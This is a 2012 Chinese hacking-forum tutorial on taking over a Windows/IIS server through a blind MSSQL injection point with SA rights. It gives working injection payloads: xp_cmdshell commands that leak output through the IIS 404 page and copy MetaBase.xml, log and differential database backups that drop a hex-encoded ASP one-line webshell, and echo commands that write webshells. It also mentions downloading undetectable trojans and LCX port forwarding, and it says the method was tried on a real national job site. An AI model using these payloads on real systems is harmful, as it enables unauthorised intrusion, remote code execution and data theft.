找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2222|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————8 W+ S" W' V8 [+ _& v% b& ?

6 W) u0 P( l* s+ F' }; b4 [7 }& L+ R  @: o2 I
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
" i+ L8 H8 B$ z1 x' {9 N/ g2 h+ y: I; B- ^
                                                                 
  N2 u, b5 O! U# ^                                                                 5 ?" o# l# {( q! @" @# l! u9 `
                                                                  论坛: http://www.90team.net/, @. @) u+ K: R% H' m
. z9 V  R, m4 C* o, J+ d# k

3 [- |  j1 v0 b: T1 g
- v2 Z; J# Z- [9 ]2 a$ g# ?友情检测国家人才网
+ P' n* U$ i  c8 C
9 }' Y! O6 N2 w2 e. Y. w2 x7 @4 Y. D2 q' ^6 L# \
内容:MSSQL注入SA权限不显错模式下的入侵7 V( J, z* Z& X4 R, w
, e! [' J) A8 i( A3 L& H: o

3 u/ T6 N, S2 `/ w0 q2 s% z: @一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。5 `( J( u, ^1 X% \( S: t' W

! i- i: k: o2 U9 W  n& \我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
6 y/ W( m6 _8 w
7 S* ^7 {" X& ~  v9 Z) K% ]& W+ B0 d" J) J% P2 F0 a" C
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
, C. [2 e# v+ s6 C- t- K  e6 r  r1 V- `
思路:1 i  j' y: m* T- P: q. M
' J; \3 q1 y! D9 ]7 o9 ?: J, p
首先:
4 L0 J" m5 q4 Y9 |: ?& O
; b: Y, r" q4 s: i  o& ?1 R$ O! l通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。- v# ^% g5 @; |7 y

* t7 H" H" t  S! X/ R" W+ z+ n1.日志备份获得Webshell: ?. Y( \/ S: C' u* Z, A

8 u5 b" Z8 Y# I  B) X2 s2 k2.数据库差异备份获得Webshell( d& q' p9 _; z; ]/ b9 a$ @
# k3 }4 W' f* t0 ?7 a. i
4.直接下载免杀远控木马。
, Y6 _$ ]% X6 A9 s( l3 x5 F! r& c1 T$ O4 y9 F* |
5.直接下载LCX将服务器端口转发出来
( x5 c! L& V4 U$ f) |' y% h4 G3 J) ?6 D& P, v( l: Q* Y; B* o. l# V
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
+ B3 `( Q. U! s* H5 {5 A, i
: \, _5 L" n/ N7 f+ Z- [$ A
1 V. z/ h. S0 Z
  V) e( a+ A1 |$ e在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了, 3 Z/ z6 n% B% O6 b

# b. c2 K! }, _$ i/ `2 j; O, W' K1 G, J我直接演示后面一个方法
' W8 q5 I' ?! g
. Z5 y/ @4 Y3 F
0 [( F5 H9 J* W8 ~8 T6 t# C8 ~分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL 7 d" r' r5 k! V& ]$ r
0 n; ?! [: X1 b0 R$ r/ X

0 `0 y4 R  G8 c1 D+ D6 M7 I  [- W' Q4 O5 F  L

: ~/ _+ v/ i" Q4 I7 t( f" t◆日志备份:
, \6 P& ~. y  f3 J
- g9 |- M( g8 S2 d! p% D$ r- L' b, |  b' C
1. 进行初始备份
/ ~' U1 A, G, U! {: W9 j  b; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--. H. {2 t+ R- g6 V7 D" }

4 ?: K! x8 R- Q" R: U5 ?" v( c2. 插入数据
+ I- {3 {" @$ y! D) d; X; e, E" J;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--0 m8 J4 D5 ?5 l% z

+ c3 h; Q9 f7 `4 y/ W0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>) `; U$ v/ b5 X
  
2 c) c. e3 @8 d- L1 W0 a! c9 v3. 备份并获得文件,删除临时表" H' `' f& ^* F* x2 I/ B4 f
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
' I/ B" y9 K* x* g- I0 O: D( \
. H8 |( \# I* \: o/ {" W# S7 N, p  b" T" b2 u

/ x5 D9 P2 M4 X* ^) y( k8 ^◆数据库差异备份. ]0 q  B  U1 x) P& @
( f2 S3 `9 K* x0 T- Q. c
(1. 进行差异备份准备工作$ K: U8 h* p( ~: H! m, b1 L4 U" U1 E

' A% P8 M% q3 N+ k- U;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--" r2 E( W9 y% S! Z  s

" Q% q' h5 k1 i* R上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
' M+ m. @+ t7 W3 W$ k* p ; }3 t* J( d  K7 m3 k
* W. m/ \$ i% x& _/ ?! b
(2. 将数据写入到数据库
# q  |' D; c- J' d6 V. v;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- " b' P: W& P, W3 P
$ O9 _0 |8 B" }3 C+ \9 F
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%># s: ]- l/ c) P  Z( L  p
% f1 ^# l0 {2 ]/ v
3. 备份数据库并清理临时文件3 z# Y3 y  I0 n  ?" z1 i
3 v0 B/ x, r$ k) @- @1 f0 c
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
3 A# B- l: N+ p: s9 x$ S/ f$ H
. u2 `) w* y9 Z( x5 ~2 B0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
0 R* `4 P$ c+ J- q' l9 {
  w" p, m( |- r8 r6 W- k
, z9 v( Y9 i# g1 N  q5 z! t/ ~& x0 g3 [8 O" I8 ]- T
用^转义字符来写ASP(一句话木马)文件的方法:   - T1 m6 B8 p# {, f: V- F
8 L% J, j2 p0 K0 X& a
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
5 ^* g2 v4 x3 O$ Z9 [' d! \' y# v+ j- M( M4 W/ f3 k: q
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp 6 c* E3 N# {; S4 U9 {/ w; U1 @, {

- L. _- e# _9 ?# T8 a  C读取IIS配置信息获取web路径& s& A6 C7 B( Z8 T+ _* O

+ d) _) C  W$ ~0 A! F4 Q% X     & z; U7 T3 ]  t2 L/ L/ z
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--" z$ i! J3 ^& s
2 W5 C1 [' q" E9 a4 M% K
执行命令
' U* \4 W9 M& d( Z     7 L$ E  A' x/ R6 U
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
3 r6 k# N% a' A3 h, _" t" W( X4 f6 k: N8 d" k( k" g1 |" V

: c/ |/ s, c% A' ^" T& C4 ^3 F
, X0 j0 z. Y8 R% H: ]& K
4 x& e9 t5 @8 A/ S  _" C/ {" h  `) n3 U& v9 y7 u$ x
! E4 c! q2 K! S7 q/ x2 K" A1 U
- ^7 L; s4 Z9 \# H" Z  j) \6 I! A
( [1 }- K) g( b' M% U) f1 d. s
# r7 ~; s) b, j
( {4 p& |( W  I& O( i6 A9 J9 E
! _# ]+ E+ N4 I$ x+ h; b
7 Z1 F$ t( t- a; F* s. S% N
% v. i4 O5 H6 q) n- a' V

; l0 U3 g! q& v# T( [% K+ B$ Z6 z9 J1 x
% U& y# T+ t3 U" w

# [0 b% L+ i5 g; L6 P
- N8 ~, k0 R- l# K8 M6 \8 R- C" f+ Y

" L. }0 F3 `5 }3 |5 t: J0 F* W4 A% _  c# w

2 u1 P5 ]# F. f8 C1 v
2 ]% ~/ _! W( J# }& |4 M0 a/ t3 y5 A) d; |8 g

& N+ Q7 W$ T. ~7 [" m- j
; L$ k: V, }3 u1 `6 Q' c# k) m, B$ l, y: A9 K# R- ~0 T

: }' y8 c" i/ L  M; b6 R7 l8 q: ]: M. t

: b. s" Q& E2 ~
/ ?. P1 B/ G* v1 U1 x5 r- u# v# Y, [2 ~4 L5 c
6 s. K8 V2 ?9 \( h7 c3 X. x

, K* U1 `' ]. V- B& r3 y$ Z+ W( m1 y# x+ Y+ {. F
8 L) @5 B+ O3 a0 _
2 X& |9 [% G; a, z9 o
4 D% L# {0 z8 ^7 Q3 f

$ C9 B+ @+ x* T, Y0 O1 q, |/ G; t  t2 l4 ?
4 Q/ p; R% \0 s) d/ l
9 m4 b4 G/ M! v! `4 M( p

9 U) c) h. u0 {8 {
5 N, I3 H, c$ l5 j% j+ I- p  C8 \" B
* f5 N+ d! }9 p5 I

# p9 c! b+ w+ ?( r
4 W" c( T, Y) K5 q/ a0 w
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表